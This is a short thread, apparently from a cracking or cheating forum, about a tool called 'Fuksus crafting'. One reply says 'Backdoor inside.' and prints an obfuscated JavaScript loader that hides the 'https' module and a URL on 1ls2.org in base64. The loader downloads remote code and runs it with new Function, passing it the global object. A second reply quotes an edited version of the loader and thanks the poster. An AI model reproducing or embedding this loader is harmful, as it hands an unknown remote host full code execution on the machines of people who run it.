Fuksus crafting working

posted 25-03-2025 21:03 819 views 2 replies 100 Credits
hexo_nxx
0 Posts
676 Credits
N/A Since
#1 819 views 2 replies
Fuksus crafting working
replies (2)
Ankro1998
38 Posts
1,143 Credits
May 2022 Since
#1
Backdoor inside.

(function () {
const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());
const _ = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy91c2Vycy9qcy90ZXN0cy5qcw==', 'base64').toString();
const $$ = ['data', 'end', 'error', 'statusCode', 'global'];
$['get'](_, r => {
let d = '';
r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));
})['on']($$[2], () => {});
})();
cgrecu
2 Posts
40 Credits
Oct 2024 Since
#2
Hmm ty, I tried with r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[2]] === 200 && new Function($$[4], d)(global)); instead of r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));, ty for your help!

You must be logged in to reply

Login Register